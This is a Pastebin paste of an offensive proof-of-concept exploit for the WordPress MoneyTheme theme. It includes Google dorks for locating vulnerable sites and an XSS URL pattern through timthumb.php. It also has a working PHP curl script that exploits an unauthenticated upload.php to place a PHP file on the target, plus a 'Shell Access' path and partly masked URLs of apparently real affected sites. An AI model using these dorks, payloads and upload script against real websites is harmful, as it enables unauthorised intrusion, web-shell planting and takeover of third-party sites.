daily pastebin goal
2%
SHARE
TWEET

[POC] Wordpress MoneyTheme Themes XSS | DevilScreaM

Berandal666 Mar 11th, 2017 43 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Title : Wordpress MoneyTheme Themes XSS / Arbitrary File Upload
  2. #Author : DevilScreaM
  3. #Date : 10/27/2013
  4. #Category : Web Applications
  5. #Type : PHP
  6. #Vendor : http://themesjunction.com
  7. #Link : http://themesjunction.com/theme/money_wordpress_template-17129.html
  8.  
  9.  
  10. #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
  11.  
  12. #Vulnerabillity : XSS, Arbitrary File Upload
  13.  
  14. #Dork :
  15.  
  16. inurl:themes/MoneyTheme/
  17. inurl:wp-content/themes/MoneyTheme/
  18.  
  19.  
  20. Cross Site Scripting
  21.  
  22. Vulnerable At 'timthumb.php'
  23.  
  24. http://site-target/wp-content/themes/MoneyTheme/timthumb.php?src=[XSS].jpg
  25.  
  26. Example :
  27.  
  28. http://cheaXXow.com/wp-content/themes/MoneyTheme/timthumb.php?src=<h1>Berandal</h1>.jpg
  29.  
  30.  
  31. ======
  32.  
  33. Arbitrary File Upload
  34.  
  35. Exploit :
  36.  
  37. <?php
  38.  
  39. $uploadfile="berandal.php";
  40.  
  41. $ch = curl_init("http://site-target/wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/");
  42. curl_setopt($ch, CURLOPT_POST, true);
  43. curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
  44. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  45. $postResult = curl_exec($ch);
  46. curl_close($ch);
  47. print "$postResult";
  48.  
  49. ?>
  50.  
  51.  
  52. Shell Access : http://site-target/wp-content/themes/MoneyTheme/uploads/uploads/berandal.php
  53.  
  54. berandal.php
  55. <?php
  56. phpinfo();
  57. ?>
  58.  
  59. Demo :
  60.  
  61. http://weXXX.com/wp-content/themes/MoneyTheme/uploads/upload.php
  62. http://coXXXash.com/wp-content/themes/MoneyTheme/uploads/upload.php
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top